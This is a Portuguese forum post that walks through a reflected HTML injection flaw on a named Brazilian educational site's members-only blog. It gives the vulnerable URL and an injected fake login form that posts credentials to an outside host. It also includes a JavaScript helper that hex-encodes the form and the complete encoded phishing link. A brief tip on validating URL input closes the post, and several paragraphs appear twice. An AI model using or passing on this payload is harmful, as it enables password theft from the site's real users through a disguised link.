Em outro post um colega falou que faz pentest em um site educacional, então como de costume resolvi olhar.
O site é educacional PoNT0 c0m PONT0 be-érre.
Percebi que a area do Blog do Pasquaaale só podia ser acessada por membros.
Olhando isso notei que podia variar o blog_pasquale assim:
e usando uma Tool para converter caracteres para hexadecimal que roda no Console de Javascript do nagevador:
Cheguei a isso:
Um link que pode ser passado como alguma matéria do site que exige login mas que na verdade captura a senha. Logo depois de capturar a senha o atacante poderá redirecionar para um site qualquer do portal.
Essa falha já vem sendo combatida pelos navegadores, no momento que fiz esse teste não funcionou no Chrome, somente no FIrefox.
Se você for fazer um site não permita que os dados da URL interfiram no conteúdo, assim se previne esse tipo de problema.
Obrigado pela atenção kkk
O site é educacional PoNT0 c0m PONT0 be-érre.
Percebi que a area do Blog do Pasquaaale só podia ser acessada por membros.
Código:
SITE/blog/wp/verificaDadosLogado.asp?tipo=2&end=blog_pasquale&owner=6037938
Código:
SITE/blog/wp/verificaDadosLogado.asp?tipo=2&end=<form action=http://site.com/login.php><input type=text><br><input type=password><input type=submit value=Entrar></form>
Código:
function conversor(a) { final = ""; for(i=0;i<a.length;i++){final +="%"+a[i].charCodeAt(0).toString(16)} return final }
Código:
conversor('<form action=http://site.com/login.php><input type=text><br><input type=password><input type=submit value=Entrar></form>')
Código:
SITE/blog/wp/verificaDadosLogado.asp?tipo=2&end=%3c%66%6f%72%6d%20%61%63%74%69%6f%6e%3d%68%74%74%70%3a%2f%2f%73%69%74%65%2e%63%6f%6d%2f%6c%6f%67%69%6e%2e%70%68%70%3e%3c%69%6e%70%75%74%20%74%79%70%65%3d%74%65%78%74%3e%3c%62%72%3e%3c%69%6e%70%75%74%20%74%79%70%65%3d%70%61%73%73%77%6f%72%64%3e%3c%69%6e%70%75%74%20%74%79%70%65%3d%73%75%62%6d%69%74%20%76%61%6c%75%65%3d%45%6e%74%72%61%72%3e%3c%2f%66%6f%72%6d%3e
Essa falha já vem sendo combatida pelos navegadores, no momento que fiz esse teste não funcionou no Chrome, somente no FIrefox.
Se você for fazer um site não permita que os dados da URL interfiram no conteúdo, assim se previne esse tipo de problema.
Obrigado pela atenção kkk
Comment